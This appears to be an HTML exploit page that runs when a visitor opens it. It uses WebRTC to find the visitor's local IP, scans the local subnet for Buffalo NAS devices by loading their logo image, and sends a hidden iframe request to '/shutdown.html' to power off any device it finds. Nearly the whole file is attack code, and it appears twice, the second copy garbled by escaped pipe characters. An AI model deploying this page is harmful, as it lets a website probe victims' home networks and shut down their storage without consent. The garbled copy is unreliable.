venoms/buffaloNASshutdown.html

## buffaloNASshutdown.html

<head>
	<title>buffalo nas shutdown</title>
</head>
<body>
	<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
	<div id="output"></div>
	<script>
		var output = document.getElementById("output");
   //stolen from https://github.com/diafygi/webrtc-ips
   //under the MIT license
   //get the IP addresses associated with an account
   function getIPs(callback){
   	var ip_dups = {};
    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
    || window.mozRTCPeerConnection
    || window.webkitRTCPeerConnection;
    var useWebKit = !!window.webkitRTCPeerConnection;
    //bypass naive webrtc blocking using an iframe
    if(!RTCPeerConnection){
        //NOTE: you need to have an iframe in the page right above the script tag
        //
        //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
        //<script>...getIPs called in here...
        //
        var win = iframe.contentWindow;
        RTCPeerConnection = win.RTCPeerConnection
        || win.mozRTCPeerConnection
        || win.webkitRTCPeerConnection;
        useWebKit = !!win.webkitRTCPeerConnection;
    }
    //minimal requirements for data connection
    var mediaConstraints = {
    	optional: [{RtpDataChannels: true}]
    };
    var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);
    function handleCandidate(candidate){
        //match just the IP address
        var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
        var ip_addr = ip_regex.exec(candidate)[1];
        //remove duplicates
        if(ip_dups[ip_addr] === undefined)
        	callback(ip_addr);
        ip_dups[ip_addr] = true;
    }
    //listen for candidate events
    pc.onicecandidate = function(ice){
        //skip non-candidate events
        if(ice.candidate)
        	handleCandidate(ice.candidate.candidate);
    };
    //create a bogus data channel
    pc.createDataChannel("");
    //create an offer sdp
    pc.createOffer(function(result){
        //trigger the stun server request
        pc.setLocalDescription(result, function(){}, function(){});
    }, function(){});
    //wait for a while to let everything done
    setTimeout(function(){
        //read candidate info from local description
        var lines = pc.localDescription.sdp.split('\n');
        lines.forEach(function(line){
        	if(line.indexOf('a=candidate:') === 0)
        		handleCandidate(line);
        });
    }, 1000);
}

function foundNAS(ip) {
	output.innerText += "Bingo! NAS at " + ip + "\n";
	var i = document.createElement("iframe");
	i.setAttribute("style", "display:none");
	i.setAttribute("src", "http://" + ip + "/shutdown.html");
	output.innerText += "Shutting it down now... This will fail if you're not logged in."
	document.body.appendChild(i);
}

var groupSize = 50;

//Using STUN, we locate the local ip address of the user
// we make sensible guesses that the NAS is in the same simple local network
getIPs(function(ip){
    //local IPs
    if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) {
    	output.innerText += "Found IP " + ip + "\n"
    	// shotgun this ip
    	var pre = /^([\d\.]+\.)\d+$/.exec(ip)[1];

    	output.innerText += "Searching " + pre + "*\n"
    	var i = 0, ed = 0;
    	//try a block of 50 NAS guesses
    	var sweep = function() {
    		ed = i + groupSize
    		var donect = 0;
    		var done = function() {
    			donect += 1;
    			if (i > 253) return;
    			if (donect == groupSize) sweep();
    			console.log(i);
    		}
    		output.innerText += "Searching " + pre + i + "-" + ed + "\n"
    		for(;i<ed;i++) {
    			var el = document.createElement("img");
    			var n = i;
    			el.setAttribute("style", "width:1em; height:1em;display:inline;border:1px solid red");

    			// logo loaded; must be NAS
    			el.addEventListener("load", function(){
    				done();
    				this.setAttribute("style", "display:block");
    				foundNAS(/(?:\d+\.){3}.\d+/g.exec(this.src)[0]);
    			});

    			// logo did not load; not NAS
    			el.addEventListener("error", function() {
    				done();
    				this.parentNode.removeChild(this);
    			});
    			el.setAttribute("src", "http://" + pre + i + "/img/common/forlink/header-logo.gif");

    			document.body.appendChild(el);
    		}
    	}
    	sweep();
    }
});
</script>

	<head>
	<title>buffalo nas shutdown</title>
	</head>
	<body>
	<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
	<div id="output"></div>
	<script>
	var output = document.getElementById("output");
	//stolen from https://github.com/diafygi/webrtc-ips
	//under the MIT license
	//get the IP addresses associated with an account
	function getIPs(callback){
	var ip_dups = {};
	//compatibility for firefox and chrome
	var RTCPeerConnection = window.RTCPeerConnection
	\|\| window.mozRTCPeerConnection
	\|\| window.webkitRTCPeerConnection;
	var useWebKit = !!window.webkitRTCPeerConnection;
	//bypass naive webrtc blocking using an iframe
	if(!RTCPeerConnection){
	//NOTE: you need to have an iframe in the page right above the script tag
	//
	//<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
	//<script>...getIPs called in here...
	//
	var win = iframe.contentWindow;
	RTCPeerConnection = win.RTCPeerConnection
	\|\| win.mozRTCPeerConnection
	\|\| win.webkitRTCPeerConnection;
	useWebKit = !!win.webkitRTCPeerConnection;
	}
	//minimal requirements for data connection
	var mediaConstraints = {
	optional: [{RtpDataChannels: true}]
	};
	var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
	//construct a new RTCPeerConnection
	var pc = new RTCPeerConnection(servers, mediaConstraints);
	function handleCandidate(candidate){
	//match just the IP address
	var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3}\|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
	var ip_addr = ip_regex.exec(candidate)[1];
	//remove duplicates
	if(ip_dups[ip_addr] === undefined)
	callback(ip_addr);
	ip_dups[ip_addr] = true;
	}
	//listen for candidate events
	pc.onicecandidate = function(ice){
	//skip non-candidate events
	if(ice.candidate)
	handleCandidate(ice.candidate.candidate);
	};
	//create a bogus data channel
	pc.createDataChannel("");
	//create an offer sdp
	pc.createOffer(function(result){
	//trigger the stun server request
	pc.setLocalDescription(result, function(){}, function(){});
	}, function(){});
	//wait for a while to let everything done
	setTimeout(function(){
	//read candidate info from local description
	var lines = pc.localDescription.sdp.split('\n');
	lines.forEach(function(line){
	if(line.indexOf('a=candidate:') === 0)
	handleCandidate(line);
	});
	}, 1000);
	}

	function foundNAS(ip) {
	output.innerText += "Bingo! NAS at " + ip + "\n";
	var i = document.createElement("iframe");
	i.setAttribute("style", "display:none");
	i.setAttribute("src", "http://" + ip + "/shutdown.html");
	output.innerText += "Shutting it down now... This will fail if you're not logged in."
	document.body.appendChild(i);
	}

	var groupSize = 50;

	//Using STUN, we locate the local ip address of the user
	// we make sensible guesses that the NAS is in the same simple local network
	getIPs(function(ip){
	//local IPs
	if (ip.match(/^(192\.168\.\|169\.254\.\|10\.\|172\.(1[6-9]\|2\d\|3[01]))/)) {
	output.innerText += "Found IP " + ip + "\n"
	// shotgun this ip
	var pre = /^([\d\.]+\.)\d+$/.exec(ip)[1];

	output.innerText += "Searching " + pre + "*\n"
	var i = 0, ed = 0;
	//try a block of 50 NAS guesses
	var sweep = function() {
	ed = i + groupSize
	var donect = 0;
	var done = function() {
	donect += 1;
	if (i > 253) return;
	if (donect == groupSize) sweep();
	console.log(i);
	}
	output.innerText += "Searching " + pre + i + "-" + ed + "\n"
	for(;i<ed;i++) {
	var el = document.createElement("img");
	var n = i;
	el.setAttribute("style", "width:1em; height:1em;display:inline;border:1px solid red");

	// logo loaded; must be NAS
	el.addEventListener("load", function(){
	done();
	this.setAttribute("style", "display:block");
	foundNAS(/(?:\d+\.){3}.\d+/g.exec(this.src)[0]);
	});

	// logo did not load; not NAS
	el.addEventListener("error", function() {
	done();
	this.parentNode.removeChild(this);
	});
	el.setAttribute("src", "http://" + pre + i + "/img/common/forlink/header-logo.gif");

	document.body.appendChild(el);
	}
	}
	sweep();
	}
	});
	</script>